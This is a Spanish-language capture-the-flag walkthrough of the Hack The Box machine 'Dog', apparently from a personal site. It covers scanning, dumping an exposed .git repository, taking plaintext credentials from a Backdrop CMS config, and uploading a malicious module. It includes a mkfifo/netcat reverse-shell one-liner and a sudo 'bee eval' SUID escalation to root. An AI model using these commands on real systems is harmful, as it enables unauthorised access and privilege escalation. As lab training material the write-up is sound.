Dog

Dog


HTB Linux

nmap -A -p- -oA dog 10.129.113.61 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -sC -sV -O -p- -oA dog 10.129.113.61

echo "10.129.113.61 dog.htb" | sudo tee -a /etc/hosts

ssh_command.

nmap -sU -O -p- -oA dog-udp 10.129.113.61

ping -c 1 10.129.113.61

ssh_command.

nmap -p- --open -T5 -v -n 10.129.113.61

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.129.113.61 -oG allPorts

ssh_command.

extractPorts allPorts

ssh_command.

nmap -sCV -p22,80 10.129.113.61 -oN targeted

ssh_command.

bc targeted -l rb

ssh_command.

whatweb http://10.129.113.61

ssh_command.

Nos dirigimos a http://10.129.113.61

ssh_command.

Vemos que esta creado con un cms llamado Backdrop.

ssh_command.

python3 GitHack.py http://dog.htb/.git/

ssh_command.

Vemos que tenemos un archivo robots.txt

ssh_command.

grep -vE '^\ \*|^/\*\*|^//|^$' settings.php

ssh_command.

Podemos ver la contrasena para root y el salt usado para los hashes de las contrasenas.

ssh_command.

grep -air 'tiffany'

ssh_command.

Iniciamos sesion.

tifanny@dog.htb:BackDropJ2024DS2024

ssh_command.

La version actual del CMS es 1.27.1

ssh_command.

ssh_command.

ssh_command.

Trate de subir un archivo zip y gz pero no lo acepto.

ssh_command.

Por ejemplo el shell.zip me lo rechazo.

ssh_command.

python -m http.server 80

ssh_command.

Pero el tar si funciono.

tar cf shell.tar shell

ssh_command.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.xx.xx.xx 443 >/tmp/f

ssh_command.

nc -lvnp 443

ssh_command.

script /dev/null -c bash Despues hacer un ctrl Z stty raw -echo; fg reset El terminal type es: xterm export TERM=xterm export SHELL=bash stty size stty rows 24 columns 80 su johncusack

johncusack:BackDropJ2024DS2024

ssh_command.

sudo -l

ssh_command.

sudo bee --root=/var/www/html eval "system('chmod u+s /bin/bash');"

bash -p

ssh_command.

© 2025 Cu3rv0x